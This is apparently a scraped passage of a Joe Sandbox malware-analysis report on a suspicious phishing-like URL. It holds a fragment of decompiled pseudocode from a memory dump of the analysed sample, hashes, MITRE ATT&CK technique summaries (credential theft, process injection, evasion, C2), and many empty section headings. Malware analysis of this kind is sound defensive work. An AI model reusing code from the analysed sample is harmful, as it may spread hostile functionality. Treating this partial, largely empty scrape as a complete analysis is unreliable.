											 *(_t1030 + 0x2924 + _t917) = _t618;
											_t911 = _t917 + 1;
											continue;
										}
									} else {
										L181:
										if( *(_t1065 - 0x20) - _t847 >= 2) {
											L195:
											_t1008 =  *(_t847 + 1) & 0x000000ff;
											_t815 =  *_t847 & 0x000000ff;
											_t847 = _t847 + 2;
											_t911 = _t1064;
											 *(_t1065 - 0x18) = _t847;
											 *(_t1065 - 4) =  *(_t1065 - 4) | _t1008 << _t1064 + 0x00000008 | _t815 << _t911;
											_t1064 = _t1064 + 0x10;
											__eflags = _t1064;
											_t1004 =  *(_t1065 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t618 = _t1004 & 0x000003ff;
												_t1047 =  *((short*)(_t1030 + 0x1ca0 + _t618 * 2));
												if(_t1047 < 0) {
													L186:
													__eflags = _t1064 - 0xa;
													if(__eflags <= 0) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1065 - 0x24) = _t911;
														while(1) {
															L189:
															_t1047 =  *((short*)( *(_t1065 - 0x14) + 0x24a0 + ((_t1004 >> _t911 & 0x00000001) +  !_t1047) * 2));
															_t911 =  *(_t1065 - 0x24) + 1;
															 *(_t1065 - 0x24) = _t911;
															__eflags = _t1047;
															if(__eflags >= 0) {
																goto L196;
															}
															L190:
															_t618 = _t911 + 1;
															__eflags = _t1064 - _t618;
															if(__eflags >= 0) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1049 = _t1047 >> 9;
													if(_t1049 == 0) {
														L191:
														_t1030 =  *(_t1065 - 0x14);
														L192:
														if(_t847 >=  *(_t1065 - 0x20)) {
															L250:
															 *_t1030 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														if(_t1064 >= _t1049) {
															L196:
															_t1030 =  *(_t1065 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t911 = _t1064;
												_t819 = ( *_t847 & 0x000000ff) << _t911;
												_t847 = _t847 + 1;
												_t1004 = _t1004 | _t819;
												 *(_t1065 - 0x18) = _t847;
												_t1064 = _t1064 + 8;
												 *(_t1065 - 4) = _t1004;
											} while (_t1064 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1005 =  *(_t1030 + 0x2c);
								_t791 =  *(_t1030 + 0x30) + _t1005;
								__eflags = _t791 - _t911;
								if(_t791 != _t911) {
									L269:
									_t689 = _t791 | 0xffffffff;
									 *_t1030 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1030 + 0x40, _t1030 + 0x2924, _t1005);
									_t797 =  *(_t1030 + 0x2c) + 0x2924 + _t1030;
									__eflags = _t797;
									memcpy(_t1030 + 0xde0, _t797,  *(_t1030 + 0x30));
									_t1068 = _t1068 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L267:
						 *(_t1065 - 0xc) = 0xffffffff;
						 *_t1030 = 0x23;
						goto L292;
					}
					goto L295;
				}
			}

APIs

memset.NTDLL ref: 00115A98
memset.NTDLL ref: 00115C6D
memset.NTDLL ref: 00115C83
memset.NTDLL ref: 00115C99

Memory Dump Source

Source File: 00000009.00000002.1910262746.00111000.00000020.sdmp, Offset: 00110000, based on PE: true

Associated: 00000009.00000002.1910257838.00110000.00000004.sdmp Download File
Associated: 00000009.00000002.1910286943.00121000.00000002.sdmp Download File
Associated: 00000009.00000002.1910291900.00122000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_110000_startedradar.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: c7a4a9410b3c0633ed317805666cbfcbb870c2d67c5e39891c29364d71db9662
Instruction ID: 0b20dd0a205dc9a43e4bd74333b7fe639147b617d735e5c42344a240e1c11923
Opcode Fuzzy Hash: c7a4a9410b3c0633ed317805666cbfcbb870c2d67c5e39891c29364d71db9662
Instruction Fuzzy Hash: F6314FB2E10F82E7E7098F64D801BA4B771BFE9304F205316E5C595A42E778A6E5C7D0

Uniqueness

Uniqueness Score: 0.00%

Description:	Adversaries may steal the credentials of a specific user or service account using Credential Access techniques or capture credentials earlier in their reconnaissance process through social engineering for means of gaining Initial Access.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Authentication logs, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, Scripting , PowerShell , or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report http://leonfurniturestore.com/sec.myacc.resourses.biz/

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 003E21B8, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 60
memorynativeCOMMON

Function 003E20FD, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 61
nativeCOMMON

Function 00D0332D, Relevance: 4.6, APIs: 3, Instructions: 127
timeUNIQUE

Function 00401BF0, Relevance: 1.5, APIs: 1, Instructions: 8
processCOMMON

Function 00D03535, Relevance: 1.5, Strings: 1, Instructions: 208
UNIQUE

Function 0040103C, Relevance: 10.5, APIs: 7, Instructions: 49
memorysynchronizationCOMMON

Function 004011F3, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Function 00401E91, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38
processCOMMON

Function 00401142, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Function 003E2493, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 29
stringCOMMON

Function 00401C07, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Function 00401C38, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Function 0040F5E0, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00401A36, Relevance: 3.1, APIs: 2, Instructions: 53
libraryloaderCOMMON

Function 004053DF, Relevance: .5, Instructions: 487
COMMONCrypto

Function 0040717A, Relevance: 40.7, APIs: 3, Strings: 20, Instructions: 467
memorylibraryUNIQUE

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre